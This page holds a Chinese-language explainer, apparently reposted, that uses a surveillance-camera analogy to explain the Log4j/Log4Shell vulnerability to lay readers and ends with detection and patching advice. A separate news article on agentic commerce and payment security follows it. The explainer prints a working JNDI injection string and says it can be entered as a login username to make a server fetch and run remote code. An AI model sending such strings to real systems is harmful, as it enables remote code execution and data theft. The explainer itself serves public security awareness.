從監視攝影機理解Log4j跟Log4Shell漏洞
從監視攝影機理解Log4j跟Log4Shell漏洞
2022.01.18 | 物聯網

2021年末資安界最大的新聞莫過於Log4j的漏洞,編號為CVE-2021-44228,又被稱為Log4Shell,甚至被一些人形容為「核彈級漏洞」,可見這個漏洞的影響程度之深遠。

關於技術上的分析已經有很多篇文章在講解了,但對於不懂技術的人來說,可能只知道這個漏洞很嚴重,卻不知道為什麼嚴重,也不知道原理到底是什麼,因此我想從讓非技術背景的人也能理解的角度出發,寫一篇比較白話的文章。

SURVEILLANCE CAMERA
圖/ shutterstock

從監視攝影機談起

我有個朋友叫小明,他家是開雜貨店的。就跟其他商店一樣,在店裡有一支監視攝影機,怕有什麼消費糾紛或是有人來搶劫或偷東西,因此讓攝影機24小時全程錄影,真的發生什麼事了,就會有證據留存下來。

但攝影機的鏡頭角度有限,不可能把整間店面的影像都拍下來,就算真的都拍下來了,要存的資料也會太多(除非小明很有錢,買了一堆攝影機)。因此,攝影機只會對準一些非常重要、值得記錄下來的地方,像是收銀台等等。

原本這支攝影機用了十幾年都沒什麼事情,畢竟不就是把影像記錄起來嗎,能有什麼事情?但最近卻突然有人發現一個攝影機的隱藏功能(嚴格來講不是隱藏功能,因為攝影機的說明書上其實有提到,可是大家都懶得看那一百多頁的說明書,所以很少人知道這個功能)

這個功能是什麼呢?那就是除了錄影以外,這台監視攝影機還有個智慧圖片辨識的功能,如果它看到特定的影像,會根據影像的內容去執行相對應的動作。舉例來說好了,這個圖片辨識功能需要把指令寫在100x100的板子上,一定要黑底白字加上特定格式,像這個樣子:

當攝影機看到上面的圖,符合特定格式,就執行了上面的指令:「關機」,就真的關機了!但關機還沒什麼,指令還可以寫說「把攝影機資料全都給我」之類的,再者,攝影機本來就會即時連線到其他伺服器,這個指令也可以對那些伺服器做操作,例如說把上面的資料全都偷下來等等。

總之呢,一旦讓攝影機拍到指定格式的東西,就會幫你執行指令。

這個功能被爆出來以後,血流成河,因為太多地方都有監視攝影機了,因此許多人都帶著這個板子去看看會不會觸發這個功能。攝影機有分型號,只有一台叫做log4j的攝影機會出事,其他不會,但要注意的事情是有些攝影機它雖然不叫做這名字,可其實是從log4j作為基底改出來的,就一樣會出事。

而有些東西儘管不是攝影機也會出事,例如說有台智慧冰箱,號稱內部有微型攝影機可以即時監控冰箱內部狀況,恰巧這個微型攝影機就是log4j這個型號的攝影機改版出來的,所以也有同樣的問題。

你想想看,如果監視攝影機出了這個問題,那全台灣、全世界這麼多人用這個型號的監視攝影機,當然會引起軒然大波,只要讓攝影機拍到特定的東西就會執行指令,這可嚴重了。

以上是對於log4j漏洞的簡單比喻,在這個故事中雜貨店就像是你的網站,而攝影機的功能就是拿來紀錄(log)對於網站的那些請求(request),整個故事只要記兩個重點就好:

  1. log4j是拿來記錄東西用的
  2. 漏洞原理是只要紀錄某些特定格式的文字,就會觸發一個功能可以執行程式碼

白話的簡易比喻到這邊先結束,想要更了解log4j,我們就必須先來看看什麼是log。

資訊安全 電腦
圖/ shutterstock

有關於log這件事

log的中文翻譯叫做日誌,我相信許多人對這個名詞並不陌生,如果你有跟工程師合作過,他在解決問題時可能會說:「我去看一下log」;或是如果你們跟合作廠商各執一詞,他說A你們說B,這時候就會說:「不然看一下log吧,看看是誰的問題」

當你跟公司的IT合作解決電腦上的小問題時,他也會跟你說要去某個地方複製log給他,他才知道發生了什麼事情。

log就像是一台24小時全年無休的監視攝影機一樣,需要記錄起重要事物的狀況。

那為什麼需要有log呢?這問題就像是「為什麼要有監視攝影機?」一樣,答案很簡單,因為出事的時候才有證據。就像行車記錄器一樣,裝了以後若不幸發生車禍,就可以協助判斷肇責。

舉個例子,假設我是A公司,我們公司是做購物網站的,而通常金流這一塊並不會自己做,而是會找其他做金流的廠商合作,在後端去「串接」金流服務商提供的功能,講白話一點就是:「當使用者要付款時,我把使用者導過去金流廠商的頁面,付款完再導回來我們網站」,相信有在網路上購物的大家應該很熟悉這個流程。

cash_flow_金流_商業_business
許多網路交易的金流系統並不是店家自己開發的,而是串接第三方的金流服務商,為了避免糾紛,過程需要追蹤、留下紀錄。
圖/ shutterstock

在這個過程中,雙方都必須留下紀錄,確保未來發生問題時有證據可以輔助說明。

例如說有天A公司突然接到一堆客訴說沒辦法付款,這時A公司直接打電話去金流商,罵說你們這什麼爛服務,怎麼突然壞掉,而金流商此時提供了伺服器的log,說:「沒有啊,我們這邊從今天早上八點開始就沒有你們導過來的紀錄了,應該是你們的問題吧?」,後來A公司檢查了自己這邊的服務,確實是因為今天早上的版本更新出了問題而導致,跟金流商一點關係都沒有。

這就是log的重要性,當出事的時候你才有證據可以盤查,才能盡可能還原當初的狀況。

做開發者的大家都知道log很重要,所以log基本上是必備的,以網站後端來說,他可能會在交易發生錯誤時留下一筆log,也有可能在發生非預期錯誤時寫下log,或是用log紀錄request中的一些欄位,比如說瀏覽器版本好了,給自己公司內部的數據分析系統來使用。

因此log是個十分常見的功能。這也是為什麼如果這個功能出事了,造成的後果會非常嚴重。

log4j是什麼?

在寫網站後端的程式碼時,會有不同的程式語言可以選擇,例如說Python、JavaScript、PHP或是Java等等,而這些程式語言都會有些專門做log的套件,簡單來說就是有人已經幫你把功能都寫好了,你只要用就好了。

而Java有一個很好用的log套件,就叫做log4j。而這個套件是隸屬於Apache軟體基金會底下,因此全名又叫做Apache Log4j。

Apache底下有很多不同的軟體跟套件,例如說:

Apache HTTP Server(大家最常看到的是這個)
Apache Cassandra
Apache Tomcat
Apache Hadoop
Apache Struts
...
所以Apache Server跟Apache log4j完全是不同的兩個東西,我知道你用Apache Server,跟你有沒有用log4j是兩件事情。

這次出問題的套件就是log4j,而出問題的原因跟我開頭講的一樣,有一個鮮為人知的功能有著安全性的漏洞,只要log4j在記錄log時記錄到某個特定格式的東西,就會去執行相對應的程式碼,就像開頭提的那個「關機」的板板一樣。

再講更詳細一點,其實並不是直接執行程式碼,那一段特定格式長得像這樣:${jndi:ldap://cymetrics.io/test}

先不要管那些你看不懂的字,你可以很明顯看到裡面有一段東西很像網址,對,它就是網址,當log4j紀錄上面那一串字的時候,它發現這串字符合特定格式,就會去裡面的網址(cymetrics.io/test)下載程式碼然後執行,因此這是一個RCE(Remote Code Execution,遠端程式碼執行)漏洞。

前面我有提過後端會記錄許多東西,假設今天有個後端服務是用Java寫的,而它用log4j記錄了使用者登入失敗時輸入的帳號,這時我只要用「${jndi:ldap://cymetrics.io/test}」這個帳號登入,就能夠觸發log4j的漏洞,讓它執行我準備好的程式碼。

只要能執行程式碼,我就可以做很多事情,例如說把伺服器上的資料偷走,或是安裝挖礦軟體幫我挖礦等等。

hacker
只要抓到log4j的這個漏洞,讓他執行程式碼,有心人士就能偷取他們想要的資料,造成嚴重的資安問題。
圖/ Pixabay

為什麼這個漏洞如此嚴重?

第一,log4j這個套件使用的人數極多,只要你有用Java,幾乎都會用這個套件來紀錄log。

第二,觸發方式容易,你只要在request的各個地方塞滿這些有問題的字串,server只要有記錄下來其中一個,就能夠觸發漏洞,而前面我們有提到紀錄log本來就是家常便飯的事情。

第三,能造成的影響極大,漏洞被觸發之後就是最嚴重的RCE,可以直接執行任意程式碼。

結合以上這三點,讓它成了一個核彈級的漏洞。到底有多嚴重,看看這些新聞標題就知道:

1.Apache Log4j 漏洞影響巨大,美國資安主管機關通令政府單位立即修復
2.微軟、蘋果都受波及!日誌框架Apache Log4j爆漏洞,堪稱近10年最大資安威脅
3.【Log4Shell漏洞資訊更新】Log4j 2.15.0修補不全、Apache再釋2.16.0新版,國家駭客已開始行動

還有一點差點忘了提,有許多其他的軟體也都用了log4j這個套件,因此也會有問題,國外有人整理出一份被影響的清單:Log4Shell log4j vulnerability (CVE-2021-44228 / CVE-2021-45046) - cheat-sheet reference guide,洋洋灑灑一大片,像是Minecraft這個遊戲的伺服器也有用到log4j,所以也被這個漏洞給影響。

該怎麼知道我有沒有被這個漏洞影響?

可以先確認自己家的程式有沒有用到log4j這個套件以及套件的版本,也需要一併檢查有沒有使用上面那張清單列出來的其他軟體。

如果你是工程師,也可以用一些現有的工具檢測是否受到漏洞影響,像是:log4j-scan或是jfrog提供的log4j-tools等等。

或如果真的不知道該如何處理,也可以聯絡我們,看我們可以怎樣幫助你。

該如何修補?

由瑞士CERT發表的這篇文章:Zero-Day Exploit Targeting Popular Java Library Log4j中,有給了一張從各個環節去防禦的圖:

如果來不及把根本原因修掉,可以先上WAF(Web Application Firewall),簡單來說就是針對網站的防火牆,把那些惡意的字串擋掉,例如說Cloudflare就在第一時間增加了WAF的規則加以阻擋,不過也有很多人在研究怎麼繞過WAF的規則,因此這是治標不治本的做法。

治本的方法就是把log4j停用或是升版,升級到不會被這個漏洞影響的版本,但有些時候第一時間的改版可能沒有把漏洞完全補掉,因此記得更新完以後還是要密切注意是否有更新的版本。例如說在這篇文章寫完後過沒多久,官方就釋出了第三個patch修復其他相關問題:Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability

結語

一個很多人用的套件,加上一個很常見的功能,再加上一個很簡單的攻擊方式以及嚴重的後果,就成了一個可以被載入史冊的漏洞。

文中有些比喻為了不要講得太細節,會是精簡過後的版本,不一定能完全涵蓋本來的漏洞,在轉換成故事比喻的過程中一定會有一些遺漏的部分,但對於整體的理解我覺得影響不大。

如果你想了解更技術的細節以及時間軸,很推薦這一支影片:Hackers vs. Developers // CVE-2021-44228 Log4Shell,裡面講得很清楚,也探討了開發者與資安從業人員的關係。

Hackers vs. Developers // CVE-2021-44228 Log4Shell

最後,希望這篇文章能讓不懂技術的大家更了解log4shell是怎樣的漏洞,以及這個漏洞為什麼如此嚴重。文中若有錯誤也請不吝留言指正,感謝。

本文由Huli授權轉載自其Cymetric Tech Blog

《數位時代》長期徵稿,針對時事科技議題,需要您的獨特觀點,歡迎各類專業人士來稿一起交流。投稿請寄edit@bnext.com.tw,文長至少800字,請附上個人100字內簡介,文章若採用將經編輯潤飾,如需改標會與您討論。

(觀點文章呈現多元意見,不代表《數位時代》的立場)

責任編輯:吳佩臻、侯品如

關鍵字: #資訊安全
往下滑看下一篇文章
代理式商務來襲:萬事達卡與NCCC攜手產業打造信任新基礎
代理式商務來襲:萬事達卡與NCCC攜手產業打造信任新基礎

隨著代理式 AI(AI Agent)的快速普及,其在商務交易中的應用也從智慧搜尋、商品比價一路延伸至自主下單,逐步形塑出全新的代理式商務(Agentic Commerce)模式。為因應此一趨勢,萬事達卡攜手聯合信用卡處理中心(NCCC)於 15 日舉辦「 AI 時代支付安全與數據信任高峰會」,匯聚產官學界專家共同交流,深入探討代理式商務下的支付授權與驗證機制,以及 AI 時代金融監理的演進與詐欺防治重點。

萬事達卡台灣區董事總經理陳懿文表示,無論交易是由人或代理式 AI 發起,都應該在安全可信的環境中完成,萬事達卡將持續強化支付安全的把關能力,不僅著眼於風險控管,更期望將「信任」轉化為未來創新的基礎與成長動能。聯合信用卡處理中心董事長桂先農則認為,面對 AI 浪潮,支付安全已不再只是技術問題,更要在消費體驗、數據運用與隱私保護之間取得動態平衡。金融監督管理委員會主任委員彭金隆表示,金管會未來將持續秉持安全與發展並進的原則,致力於打造可信賴、穩健且具有包容性的環境,加速金融 AI 應用的發展。

Mastercard-02.jpg
金融監督管理委員會主任委員彭金隆特別出席,表示金管會核心理念為「負責任創新」,並於2025 年成立『金融科技產業聯盟』,期待結合金融周邊單位與金融機構的力量,打造可信任及穩健的AI 金融應用環境。
圖/ 數位時代
Mastercard-03.jpg
萬事達卡台灣區董事總經理陳懿文(左)攜手聯合信用卡處理中心董事長桂先農(右)致詞不約而同提到:面對 AI 浪潮,支付安全將會是如何在消費體驗、數據運用與隱私保護之間取得動態平衡的治理課題。
圖/ 數位時代

AI Agent 重新定義消費旅程,萬事達卡提 4 大要素保障支付安全

Google Cloud 台灣技術總經理林書平認為,代理式商務正在重新定義消費旅程,而 Universal Commerce Protocol(UCP)則是支撐這場變革的關鍵。他表示,UCP 就好像電商界的 Type-C 接口,可以串聯不同代理式 AI 與電商平台後台系統,讓代理式 AI 可以根據消費者需求,自主完成商品搜尋與推薦、比價到下單的交易流程,打造更即時、更個人化的消費體驗。

在此情況下,支付不再只是交易流程中的最後一步,而是串聯個人化服務、授權機制、風險控管與信任的核心環節。萬事達卡數據與顧問服務部資深副總裁戴輝瑾指出,要確保代理式商務下的交易安全,必須具備 4 個關鍵要素,包括可驗證代理式 AI 身份、明確的使用者授權、確保代理式 AI 執行的任務沒有超出授權範圍,以及在發生爭議時,能透過公開透明且可追溯的機制進行處理,確保各方權益。

此外,他也強調,風險管理不應侷限於付款當下,需從交易前、交易中、交易後到持續性的監控,建立端到端的治理架構。為此,萬事達卡推出多元解決方案強化整體防護能力,包括以 Identity Solution 強化數位身分驗證、以 Decision Intelligence Pro 提升即時風險判斷能力、透過 Ethoca 優化爭議處理流程,以及藉由 Recorded Future 提供即時網路威脅情報,全面覆蓋交易生命週期,打造更完整的支付安全生態系。

AI 監理邁入新階段,以信任為核心的監管新框架

從監理角度來看,AI 所帶來的變革也同步改寫治理思維。金管會銀行局局長童政彰指出,監理機關不僅要加強國際合作,更應深化與金融業及科技業的對話,建立更開放且具前瞻性的監理模式。進一步針對代理式商務來看,政大金融AI創新中心主任王儷玲認為,金融監理重心應由模型與資料管理,轉向代理式 AI 安全,尤其當 AI 可以代理消費者進行支付時,如何確保代理式 AI 在授權範圍內執行交易,將成為未來的監理重點。

在國際監理趨勢方面,萬事達卡數據與顧問服務部副總裁 Audrey Wong 分析亞太與全球支付生態並指出,AI 時代的監管核心已轉向「以信任為基礎」,金融業在應用 AI 時,必須具備可解釋性、可問責性與可稽核性,確保決策透明且可追溯。同時,隨著詐騙與洗錢行為跨境化,監理機制也應向外延伸,確保跨境一致性,並透過如 ISO 20022 等標準強化資料透明與治理能力。

回到金融機構實務面,國泰世華銀行數據長梁明喬表示,代理式 AI 將對既有支付與風控機制帶來結構性改變,以信用卡支付為例,過往的驗證重點在於是否為本人,但在代理式 AI 情境下,則轉變為驗證 AI 的身份、授權來源與行為意圖。未來,隨著代理式 AI 的普及發展,授權與權限管理將變得更加重要。

Mastercard-04.jpg
關鍵對談以「AI 時代的資安監管趨勢與企業應對策略 」為題,左起邀請:數位時代總編輯 王志仁主持及重磅與談人國立政治大學金融 AI 創新中心主任 王儷玲、國泰世華銀行數據長 梁明喬及萬事達卡數據與顧問服務部副總裁 Audrey Wong與會。
圖/ 數位時代

AI 詐騙升級,聯防機制成新關鍵

最後,本場研討會亦聚焦討論 AI 造成詐欺風險升級的議題。台灣大哥大資訊長蔡祈岩觀察,詐騙已從單一管道演變為跨平台、跨場景的複合型攻擊,尤其是假冒「代理式 AI 」的詐騙手法,透過對話引導消費者提供個資與支付資訊,正成為新興且高風險的威脅來源。

萬事達卡 Franchise Innovation 副總裁Dennis Koh 進一步歸納出 3 大詐欺發展趨勢。第一,Deepfake 服務化使詐騙門檻與成本大幅降低。第二,詐欺行為跨境化與遠端化,已經突破地理限制、走向全球攻擊。第三,社交工程從大量投放釣魚信件,轉為高度個人化、難以辨識的精準攻擊。

面對詐欺手法持續演進,聯合信用卡處理中心風險管理部資深協理李錦堯表示,聯卡中心正透過區塊鏈與FIDO生物識別技術,打造無密碼的數位身分認證系統,並結合AI數據模型提升TRACE風險預警系統的效能。未來,聯卡中心將持續優化模型,並建立跨機構資料共享的聯防機制,整合發卡機構與國際組織資源,以提升整體防詐能力,對抗日益複雜的詐欺攻擊。

代理式商務將為消費者帶來更好的消費與支付體驗,但同時也對安全、治理與信任造成更大的影響,促使產業必須從單點防護走向跨機構、跨生態系的整體治理思維。在此趨勢下,萬事達卡將持續扮演關鍵推動者角色,攜手監理機關與產業夥伴,強化支付安全標準,推動台灣支付產業的監管框架與創新發展,打造兼顧效率與信任的數位商務環境。

Mastercard-05.jpg
回應AI 代理經濟下的詐欺防制與個資挑戰,本論壇特別邀請台灣大哥大資訊長 蔡祈岩、聯合信用卡處理中心風險管理部資深協理 李錦堯、萬事達卡Franchise Innovation副總裁 Dennis Koh交流趨勢觀點。
圖/ 數位時代

登入數位時代會員

開啟專屬自己的主題內容,

每日推播重點文章

閱讀會員專屬文章

請先登入數位時代會員

看更多獨享內容

請先登入數位時代會員

開啟收藏文章功能,

請先登入數位時代會員

開啟訂閱文章分類功能,

請先登入數位時代會員

我還不是會員, 註冊去!
追蹤我們
AI全球100+台灣20
© 2026 Business Next Media Corp. All Rights Reserved. 本網站內容未經允許,不得轉載。
106 台北市大安區光復南路102號9樓